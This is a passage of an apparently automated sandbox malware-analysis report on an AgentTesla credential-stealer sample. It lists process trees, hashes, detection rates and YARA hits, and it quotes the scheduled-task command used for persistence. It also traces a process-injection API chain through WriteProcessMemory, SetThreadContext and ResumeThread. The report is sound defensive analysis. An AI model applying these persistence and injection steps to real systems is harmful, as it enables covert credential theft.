                                                                                                        Commandline:C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe
                                                                                                        Imagebase:0x440000
                                                                                                        File size:646'144 bytes
                                                                                                        MD5 hash:8B627084E10AD9B77436A4C3D8EA5EBB
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 55%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:03:04:31
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        Imagebase:0x7ff693ab0000
                                                                                                        File size:496'640 bytes
                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:03:04:33
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp"
                                                                                                        Imagebase:0xba0000
                                                                                                        File size:187'904 bytes
                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:03:04:33
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:03:04:34
                                                                                                        Start date:21/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                        Imagebase:0xfb0000
                                                                                                        File size:45'984 bytes
                                                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:9.5%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:174
                                                                                                          Total number of Limit Nodes:11
                                                                                                          execution_graph 31131 2b2d3c0 31132 2b2d406 GetCurrentProcess 31131->31132 31134 2b2d458 GetCurrentThread 31132->31134 31137 2b2d451 31132->31137 31135 2b2d495 GetCurrentProcess 31134->31135 31136 2b2d48e 31134->31136 31138 2b2d4cb 31135->31138 31136->31135 31137->31134 31139 2b2d4f3 GetCurrentThreadId 31138->31139 31140 2b2d524 31139->31140 31141 7db0f68 31142 7db10f3 31141->31142 31143 7db0f8e 31141->31143 31143->31142 31146 7db11e8 PostMessageW 31143->31146 31148 7db11e0 31143->31148 31147 7db1254 31146->31147 31147->31143 31149 7db11e9 PostMessageW 31148->31149 31150 7db1254 31149->31150 31150->31143 30926 2b2b038 30930 2b2b130 30926->30930 30935 2b2b120 30926->30935 30927 2b2b047 30931 2b2b164 30930->30931 30932 2b2b141 30930->30932 30931->30927 30932->30931 30933 2b2b368 GetModuleHandleW 30932->30933 30934 2b2b395 30933->30934 30934->30927 30936 2b2b164 30935->30936 30937 2b2b141 30935->30937 30936->30927 30937->30936 30938 2b2b368 GetModuleHandleW 30937->30938 30939 2b2b395 30938->30939 30939->30927 30940 2b24668 30941 2b2467a 30940->30941 30942 2b24686 30941->30942 30944 2b24778 30941->30944 30945 2b2479d 30944->30945 30949 2b24888 30945->30949 30953 2b24879 30945->30953 30951 2b248af 30949->30951 30950 2b2498c 30951->30950 30957 2b244c4 30951->30957 30954 2b24888 30953->30954 30955 2b244c4 CreateActCtxA 30954->30955 30956 2b2498c 30954->30956 30955->30956 30958 2b25918 CreateActCtxA 30957->30958 30960 2b259cf 30958->30960 31151 2b2d608 DuplicateHandle 31152 2b2d69e 31151->31152 30961 5ecd000 30962 5ecce6c 30961->30962 30962->30961 30963 5ecd027 30962->30963 30966 5ecf998 30962->30966 30984 5ecf989 30962->30984 30967 5ecf9b2 30966->30967 30975 5ecf9d6 30967->30975 31002 7db05b6 30967->31002 31006 7db02f0 30967->31006 31011 7db0633 30967->31011 31016 7db0933 30967->31016 31020 7db013c 30967->31020 31024 7db049e 30967->31024 31029 7db0ab8 30967->31029 31033 7db04fa 30967->31033 31038 7db01c2 30967->31038 31042 7db0a23 30967->31042 31046 7db044c 30967->31046 31053 7db042d 30967->31053 31058 7db01ed 30967->31058 31064 7db0b0e 30967->31064 31069 7db0b4a 30967->31069 30975->30963 30985 5ecf9b2 30984->30985 30986 7db04fa 2 API calls 30985->30986 30987 7db0ab8 2 API calls 30985->30987 30988 7db049e 2 API calls 30985->30988 30989 7db013c 2 API calls 30985->30989 30990 7db0933 2 API calls 30985->30990 30991 7db0633 2 API calls 30985->30991 30992 7db02f0 2 API calls 30985->30992 30993 5ecf9d6 30985->30993 30994 7db05b6 2 API calls 30985->30994 30995 7db0b4a 2 API calls 30985->30995 30996 7db0b0e 2 API calls 30985->30996 30997 7db01ed 4 API calls 30985->30997 30998 7db042d 2 API calls 30985->30998 30999 7db044c 4 API calls 30985->30999 31000 7db0a23 2 API calls 30985->31000 31001 7db01c2 2 API calls 30985->31001 30986->30993 30987->30993 30988->30993 30989->30993 30990->30993 30991->30993 30992->30993 30993->30963 30994->30993 30995->30993 30996->30993 30997->30993 30998->30993 30999->30993 31000->30993 31001->30993 31073 5ecc7c8 31002->31073 31077 5ecc7c0 31002->31077 31003 7db05e4 31008 7db0305 31006->31008 31007 7db08a7 31007->30975 31008->31007 31081 7db0e78 31008->31081 31086 7db0e68 31008->31086 31012 7db065c 31011->31012 31014 5ecc7c8 WriteProcessMemory 31012->31014 31015 5ecc7c0 WriteProcessMemory 31012->31015 31013 7db0680 31014->31013 31015->31013 31099 5ecc1f8 31016->31099 31103 5ecc1f3 31016->31103 31017 7db094d 31107 5ecca44 31020->31107 31111 5ecca50 31020->31111 31025 7db04a4 31024->31025 31115 5ecc8b8 31025->31115 31119 5ecc8b2 31025->31119 31026 7db019b 31026->30975 31030 7db0ac0 31029->31030 31031 7db0e78 2 API calls 31030->31031 31032 7db0e68 2 API calls 31030->31032 31031->31030 31032->31030 31034 7db0500 31033->31034 31036 5ecc7c8 WriteProcessMemory 31034->31036 31037 5ecc7c0 WriteProcessMemory 31034->31037 31035 7db0680 31036->31035 31037->31035 31039 7db01e6 31038->31039 31040 7db0e78 2 API calls 31039->31040 31041 7db0e68 2 API calls 31039->31041 31040->31039 31041->31039 31044 5ecc7c8 WriteProcessMemory 31042->31044 31045 5ecc7c0 WriteProcessMemory 31042->31045 31043 7db0a47 31044->31043 31045->31043 31123 5ecc708 31046->31123 31127 5ecc700 31046->31127 31047 7db0436 31049 5ecc7c8 WriteProcessMemory 31047->31049 31050 5ecc7c0 WriteProcessMemory 31047->31050 31048 7db0680 31049->31048 31050->31048 31055 7db0501 31053->31055 31054 7db0680 31056 5ecc7c8 WriteProcessMemory 31055->31056 31057 5ecc7c0 WriteProcessMemory 31055->31057 31056->31054 31057->31054 31062 5ecc1f8 Wow64SetThreadContext 31058->31062 31063 5ecc1f3 Wow64SetThreadContext 31058->31063 31059 7db01d9 31060 7db0e78 2 API calls 31059->31060 31061 7db0e68 2 API calls 31059->31061 31060->31059 31061->31059 31062->31059 31063->31059 31065 7db0b11 31064->31065 31066 7db0ac0 31064->31066 31067 7db0e78 2 API calls 31066->31067 31068 7db0e68 2 API calls 31066->31068 31067->31066 31068->31066 31070 7db0ac0 31069->31070 31071 7db0e78 2 API calls 31070->31071 31072 7db0e68 2 API calls 31070->31072 31071->31070 31072->31070 31074 5ecc810 WriteProcessMemory 31073->31074 31076 5ecc867 31074->31076 31076->31003 31078 5ecc810 WriteProcessMemory 31077->31078 31080 5ecc867 31078->31080 31080->31003 31082 7db0e8d 31081->31082 31091 5ecbd09 31082->31091 31095 5ecbd10 31082->31095 31083 7db0ea0 31083->31008 31087 7db0e8d 31086->31087 31089 5ecbd09 ResumeThread 31087->31089 31090 5ecbd10 ResumeThread 31087->31090 31088 7db0ea0 31088->31008 31089->31088 31090->31088 31092 5ecbcfd 31091->31092 31092->31091 31093 5ecbd5a ResumeThread 31092->31093 31094 5ecbd81 31093->31094 31094->31083 31096 5ecbd11 ResumeThread 31095->31096 31098 5ecbd81 31096->31098 31098->31083 31100 5ecc23d Wow64SetThreadContext 31099->31100 31102 5ecc285 31100->31102 31102->31017 31104 5ecc1f8 Wow64SetThreadContext 31103->31104 31106 5ecc285 31104->31106 31106->31017 31108 5ecca4a CreateProcessA 31107->31108 31110 5eccc9b 31108->31110 31110->31110 31112 5eccad9 CreateProcessA 31111->31112 31114 5eccc9b 31112->31114 31114->31114 31116 5ecc903 ReadProcessMemory 31115->31116 31118 5ecc947 31116->31118 31118->31026 31120 5ecc8a5 31119->31120 31120->31119 31121 5ecc916 ReadProcessMemory 31120->31121 31122 5ecc947 31121->31122 31122->31026 31124 5ecc748 VirtualAllocEx 31123->31124 31126 5ecc785 31124->31126 31126->31047 31128 5ecc748 VirtualAllocEx 31127->31128 31130 5ecc785 31128->31130 31130->31047

                                                                                                          Executed Functions

                                                                                                          Function 07DB1F48 Relevance: 1.7, Strings: 1, Instructions: 413COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 533 7db1f48-7db1f50 534 7db1faf-7db1fbb 533->534 535 7db1f52-7db1f7a 533->535 543 7db1fce-7db1fee 534->543 544 7db1fbd-7db1fc7 534->544 536 7db232a-7db232f 535->536 537 7db1f80-7db1fab call 7db1968 call 7db1978 call 7db1d54 535->537 539 7db2339-7db233c 536->539 540 7db2331-7db2333 536->540 537->534 716 7db233e call 7db1f48 539->716 717 7db233e call 7db2370 539->717 540->539 550 7db2001-7db2021 543->550 551 7db1ff0-7db1ffa 543->551 544->543 546 7db2344-7db234c 549 7db2352-7db2359 546->549 555 7db2023-7db202d 550->555 556 7db2034-7db2054 550->556 551->550 555->556 558 7db2067-7db2070 call 7db1d64 556->558 559 7db2056-7db2060 556->559 562 7db2072-7db208d call 7db1d64 558->562 563 7db2094-7db209d call 7db1d74 558->563 559->558 562->563 568 7db209f-7db20ba call 7db1d74 563->568 569 7db20c1-7db20ca call 7db1d84 563->569 568->569 575 7db20cc-7db20d0 call 7db1d94 569->575 576 7db20d5-7db20f1 569->576 575->576 580 7db2109-7db210d 576->580 581 7db20f3-7db20f9 576->581 584 7db210f-7db2120 call 7db1da4 580->584 585 7db2127-7db216f 580->585 582 7db20fb 581->582 583 7db20fd-7db20ff 581->583 582->580 583->580 584->585 591 7db2193-7db219a 585->591 592 7db2171 585->592 593 7db219c-7db21ab 591->593 594 7db21b1-7db21bf call 7db1db4 591->594 595 7db2174-7db217a 592->595 593->594 604 7db21c9-7db21f3 call 7db1dc4 594->604 605 7db21c1-7db21c3 594->605 597 7db235a-7db2368 595->597 598 7db2180-7db2186 595->598 606 7db236a-7db2399 597->606 607 7db23cc 597->607 601 7db2188-7db218a 598->601 602 7db2190-7db2191 598->602 601->602 602->591 602->595 622 7db2220-7db223c 604->622 623 7db21f5-7db2203 604->623 605->604 608 7db239b-7db23ae 606->608 609 7db23f8-7db2408 606->609 610 7db23cd-7db23ce 607->610 611 7db23b6-7db23bc 607->611 608->611 620 7db25de-7db25e5 609->620 621 7db240e-7db2418 609->621 616 7db23d2-7db23d7 610->616 611->609 613 7db23be-7db23c4 611->613 613->616 617 7db23c6-7db23c8 613->617 624 7db23d9-7db23dd 616->624 625 7db23e4-7db23f1 616->625 617->607 626 7db25e7-7db25ef call 7db1ef8 620->626 627 7db25f4-7db2607 620->627 628 7db241a-7db2421 621->628 629 7db2422-7db242c 621->629 637 7db224f-7db2276 call 7db1dd4 622->637 638 7db223e-7db2248 622->638 623->622 636 7db2205-7db2219 623->636 624->625 625->609 626->627 630 7db2432-7db2472 629->630 631 7db2611-7db26b2 629->631 659 7db248a-7db248e 630->659 660 7db2474-7db247a 630->660 688 7db26b9-7db26ef 631->688 689 7db26b4 631->689 636->622 648 7db2278-7db227e 637->648 649 7db228e-7db2292 637->649 638->637 653 7db2282-7db2284 648->653 654 7db2280 648->654 651 7db22ad-7db22c9 649->651 652 7db2294-7db22a6 649->652 662 7db22cb-7db22d1 651->662 663 7db22e1-7db22e5 651->663 652->651 653->649 654->649 666 7db24bb-7db24d3 call 7db1ee8 659->666 667 7db2490-7db24b5 659->667 664 7db247e-7db2480 660->664 665 7db247c 660->665 669 7db22d3 662->669 670 7db22d5-7db22d7 662->670 663->549 671 7db22e7-7db22f5 663->671 664->659 665->659 681 7db24e0-7db24e8 666->681 682 7db24d5-7db24da 666->682 667->666 669->663 670->663 676 7db2307-7db230b 671->676 677 7db22f7-7db2305 671->677 684 7db2311-7db2329 676->684 677->676 677->684 686 7db24ea-7db24f8 681->686 687 7db24fe-7db251d 681->687 682->681 686->687 693 7db251f-7db2525 687->693 694 7db2535-7db2539 687->694 701 7db26f9 688->701 702 7db26f1 688->702 689->688 696 7db2529-7db252b 693->696 697 7db2527 693->697 699 7db253b-7db2548 694->699 700 7db2592-7db25db 694->700 696->694 697->694 707 7db254a-7db257c 699->707 708 7db257e-7db258b 699->708 700->620 706 7db26fa 701->706 702->701 706->706 707->708 708->700 716->546 717->546
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: U
                                                                                                          • API String ID: 0-3372436214
                                                                                                          • Opcode ID: c2f76820912f8727c95fb3198e016d2b83f2a354603562f92964dbaec6b073b0
                                                                                                          • Instruction ID: 539265f93273683a4946ab775d6104b6c265181764699917e5297669c887c910
                                                                                                          • Opcode Fuzzy Hash: c2f76820912f8727c95fb3198e016d2b83f2a354603562f92964dbaec6b073b0
                                                                                                          • Instruction Fuzzy Hash: D0E1BBB2701305CFDB29DB65C560BAEB7F7AF89300F1448ADD14A9B290CB35E905CB61
                                                                                                          Function 05EC6DB9 Relevance: .1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 44c967df91f22c2ee3d2bb236e1b82bd98573a54604994e55af4913b8fcdd167
                                                                                                          • Instruction ID: fe78d3a2a4299fd5f02c57916a0684d9f6c95070a4cba16ddd22669ae3084e28
                                                                                                          • Opcode Fuzzy Hash: 44c967df91f22c2ee3d2bb236e1b82bd98573a54604994e55af4913b8fcdd167
                                                                                                          • Instruction Fuzzy Hash: 4021F7B1E046588BEB18CF9BC9043EEBFF7AFC9300F14D46E940A66254EB74494A8E40
                                                                                                          Function 05EC6DC8 Relevance: .1, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a41f0fdb226fe62137b22b236130eb77ce4e730f9ffb16febce4472bd78b8201
                                                                                                          • Instruction ID: 97bfa8b4c045fe78ff3f573717da0778f05b7b774a3b932411f7acbbccc9b995
                                                                                                          • Opcode Fuzzy Hash: a41f0fdb226fe62137b22b236130eb77ce4e730f9ffb16febce4472bd78b8201
                                                                                                          • Instruction Fuzzy Hash: 4511CCB1D046588BDB18CF9BC9452DEFEF7AFC9300F14D46A940A66255EB7409468E40
                                                                                                          Function 07DB0879 Relevance: .0, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f51aaef62a5205ab876b007e0cb27327c467d3c118a23faa623da78b29c63d77
                                                                                                          • Instruction ID: 5b3aebb2b2399cbf94394a57ad08f0405ef379eb0fe71d32e703900bb64ff9bd
                                                                                                          • Opcode Fuzzy Hash: f51aaef62a5205ab876b007e0cb27327c467d3c118a23faa623da78b29c63d77
                                                                                                          • Instruction Fuzzy Hash: E4016DB495D254CFCB208F54D8486F9FBB8FB0B319F0431E6D48B96152CB309685CA15
                                                                                                          Function 07DB0223 Relevance: .0, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: eb15ec4d64928e52c44f1f521625d8b45aed37d1ed1d6d66dea9774dc9859da7
                                                                                                          • Instruction ID: 35319a9cad760ad8a7d2d29c828f9940111629c38f920e728916721c422efb5d
                                                                                                          • Opcode Fuzzy Hash: eb15ec4d64928e52c44f1f521625d8b45aed37d1ed1d6d66dea9774dc9859da7
                                                                                                          • Instruction Fuzzy Hash: D1F0C9B8969258CBCB248F54D9447FDFBB8AB4A355F1060A6E04AA2211CB309A85CF05
                                                                                                          Function 07DB0834 Relevance: .0, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7b48bc99f54876f4fee441b41ae1d00420031141ed33ddc8addab46712babeb1
                                                                                                          • Instruction ID: 90c04a9974a17fef0036771d066c5f408bd15634e5457d421a6d1165a4202446
                                                                                                          • Opcode Fuzzy Hash: 7b48bc99f54876f4fee441b41ae1d00420031141ed33ddc8addab46712babeb1
                                                                                                          • Instruction Fuzzy Hash: 1BE0EDB4959118DBC7208F54D8447FDFB78AB4B315F1070A5D48FA2211CB309AD5CA14
                                                                                                          Function 07DB0797 Relevance: .0, Instructions: 26COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1790232761.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7db0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5dcae8f72169f06361545971729310de87e8ec412b176038f5ee691262309859
                                                                                                          • Instruction ID: 1c5f8108d8a0eca5ceb6e81606e386dd37d2b9a81ff45f16a9d11f9d43efd8ab
                                                                                                          • Opcode Fuzzy Hash: 5dcae8f72169f06361545971729310de87e8ec412b176038f5ee691262309859
                                                                                                          • Instruction Fuzzy Hash: 06E04FB4D5E108CFCB506F64A8482F9FB78EB07215F1430A5D04E93501CA308A91CB19
                                                                                                          Function 02B2D3B0 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 294 2b2d3b0-2b2d44f GetCurrentProcess 298 2b2d451-2b2d457 294->298 299 2b2d458-2b2d48c GetCurrentThread 294->299 298->299 300 2b2d495-2b2d4c9 GetCurrentProcess 299->300 301 2b2d48e-2b2d494 299->301 303 2b2d4d2-2b2d4ed call 2b2d590 300->303 304 2b2d4cb-2b2d4d1 300->304 301->300 307 2b2d4f3-2b2d522 GetCurrentThreadId 303->307 304->303 308 2b2d524-2b2d52a 307->308 309 2b2d52b-2b2d58d 307->309 308->309
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B2D43E
                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B2D47B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B2D4B8
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B2D511
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 94c40d0c41c3c35b32f8011a216792d10e0e1d7a3e4a2ee671540adb5791c9b3
                                                                                                          • Instruction ID: ed464672b40f663393dcb98e2801b35489f64b7b05e5f3d2036f4731196851fd
                                                                                                          • Opcode Fuzzy Hash: 94c40d0c41c3c35b32f8011a216792d10e0e1d7a3e4a2ee671540adb5791c9b3
                                                                                                          • Instruction Fuzzy Hash: A55177B09003099FDB04DFA9D548BDEBBF0AF48318F24C459E019A7360CB74A984CB65
                                                                                                          Function 02B2D3C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 316 2b2d3c0-2b2d44f GetCurrentProcess 320 2b2d451-2b2d457 316->320 321 2b2d458-2b2d48c GetCurrentThread 316->321 320->321 322 2b2d495-2b2d4c9 GetCurrentProcess 321->322 323 2b2d48e-2b2d494 321->323 325 2b2d4d2-2b2d4ed call 2b2d590 322->325 326 2b2d4cb-2b2d4d1 322->326 323->322 329 2b2d4f3-2b2d522 GetCurrentThreadId 325->329 326->325 330 2b2d524-2b2d52a 329->330 331 2b2d52b-2b2d58d 329->331 330->331
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B2D43E
                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B2D47B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B2D4B8
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B2D511
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1778135065.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2b20000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 33204783b7bbdbe23d064f1ec13688f3c5d4188817dca131a308d8792bde0ca7
                                                                                                          • Instruction ID: fd0d90ec30c64c263626f2edde2066f30997a5ff06740d3473fa4686daae8bc2
                                                                                                          • Opcode Fuzzy Hash: 33204783b7bbdbe23d064f1ec13688f3c5d4188817dca131a308d8792bde0ca7
                                                                                                          • Instruction Fuzzy Hash: DA5146B09003099FDB14DFAAD548BDEBBF5EF88318F24C459E018A7260DB74A984CB65
                                                                                                          Function 05ECCA44 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 360 5ecca44-5ecca48 361 5ecca4a 360->361 362 5ecca4b-5eccae5 360->362 361->362 364 5eccb1e-5eccb3e 362->364 365 5eccae7-5eccaf1 362->365 372 5eccb77-5eccba6 364->372 373 5eccb40-5eccb4a 364->373 365->364 366 5eccaf3-5eccaf5 365->366 367 5eccb18-5eccb1b 366->367 368 5eccaf7-5eccb01 366->368 367->364 370 5eccb05-5eccb14 368->370 371 5eccb03 368->371 370->370 374 5eccb16 370->374 371->370 379 5eccbdf-5eccc99 CreateProcessA 372->379 380 5eccba8-5eccbb2 372->380 373->372 375 5eccb4c-5eccb4e 373->375 374->367 377 5eccb50-5eccb5a 375->377 378 5eccb71-5eccb74 375->378 381 5eccb5c 377->381 382 5eccb5e-5eccb6d 377->382 378->372 393 5eccc9b-5eccca1 379->393 394 5eccca2-5eccd28 379->394 380->379 384 5eccbb4-5eccbb6 380->384 381->382 382->382 383 5eccb6f 382->383 383->378 385 5eccbb8-5eccbc2 384->385 386 5eccbd9-5eccbdc 384->386 388 5eccbc4 385->388 389 5eccbc6-5eccbd5 385->389 386->379 388->389 389->389 391 5eccbd7 389->391 391->386 393->394 404 5eccd38-5eccd3c 394->404 405 5eccd2a-5eccd2e 394->405 406 5eccd4c-5eccd50 404->406 407 5eccd3e-5eccd42 404->407 405->404 408 5eccd30 405->408 410 5eccd60-5eccd64 406->410 411 5eccd52-5eccd56 406->411 407->406 409 5eccd44 407->409 408->404 409->406 413 5eccd76-5eccd7d 410->413 414 5eccd66-5eccd6c 410->414 411->410 412 5eccd58 411->412 412->410 415 5eccd7f-5eccd8e 413->415 416 5eccd94 413->416 414->413 415->416 417 5eccd95 416->417 417->417
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05ECCC86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1786761579.0000000005EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_5ec0000_DATASHEET.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 7f400d2d1c65d9ae5c7464fa8a061a74491eb500798abe6fb9e12db83931c910
                                                                                                          • Instruction ID: c00058f77f099727733e8d004578fb54aaa4404e200519ffa12fd985a62bd5f0
                                                                                                          • Opcode Fuzzy Hash: 7f400d2d1c65d9ae5c7464fa8a061a74491eb500798abe6fb9e12db83931c910
                                                                                                          • Instruction Fuzzy Hash: E7A16D71D002199FEB20CFA8C941BEDBFB2BF44314F1485A9E85DA7240D7749986CF91
                                                                                                          Function 05ECCA50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
